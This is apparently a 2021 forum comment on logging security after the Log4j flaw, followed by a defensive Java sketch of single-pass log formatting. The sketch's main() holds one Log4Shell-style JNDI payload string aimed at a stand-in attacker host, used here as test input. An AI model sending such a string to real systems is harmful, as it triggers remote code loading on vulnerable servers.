&#x27;Should&#x27; is considered harmful; common sense is not so common.<br> <p> It is worth making a habit of overstating safe and diligent behaviour, here calling out the options for logging: don&#x27;t consume user/attacker input without putting it in a security zone; don&#x27;t call out to the network without knowing what you&#x27;re calling out to the network for; build your string before publishing it; ideally only use printf-type string substitution when logging. You don&#x27;t need recursive descent or a state machine and it&#x27;s a security hole waiting to happen if your logger is functionally a Turing-Complete Domain-Specific Language.<br> <p> On top, I think we ought to look at the wider culture around Enterprise Java (as I understand it) that uses a lot of instantaneous point-of-use anonymous functions in the Java 8 streams modality. This means programmers are trained away from instantiating and using items outside an anonymous lambda on composed object methods, so being able to log some data might just in-line process user-/attacker-supplied input.<br> <p> K3n.<br> </div> Mon, 13 Dec 2021 11:15:16 +0000
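The "printf-type string substitution" advice in the comment above can be sketched roughly as follows. This is only an illustration, not Log4j's API: the class name SinglePassFormat and its format() method are made up for the example, and it assumes a simple "{}" placeholder syntax. The point it tries to show is that substituted values are written straight to the output and never scanned again, so lookup-like text inside user-supplied data stays literal.

```java
public final class SinglePassFormat {
    private SinglePassFormat() {}

    // Hypothetical helper: replaces each "{}" in the template with the next
    // argument, left to right. Substituted text is appended to the output and
    // never re-scanned, so placeholder-like or lookup-like text inside an
    // argument is treated as plain data.
    public static String format(String template, Object... args) {
        StringBuilder out = new StringBuilder(template.length() + 16 * args.length);
        int next = 0; // index of the next unused argument
        int i = 0;    // current position in the template
        while (i < template.length()) {
            if (template.startsWith("{}", i) && next < args.length) {
                out.append(String.valueOf(args[next++]));
                i += 2;
            } else {
                // Ordinary character, or a "{}" with no argument left:
                // copy it through unchanged.
                out.append(template.charAt(i));
                i++;
            }
        }
        return out.toString();
    }

    public static void main(String[] argv) {
        // Attacker-style input is logged verbatim instead of being expanded.
        String hostile = "${jndi:ldap://attacker.example/a}";
        System.out.println(format("login failed for user={}", hostile));
    }
}
```

Only the template, which the application author controls, is ever interpreted; anything richer (such as a JNDI lookup) would have to be an explicit opt-in by the caller rather than something triggered by the logged data.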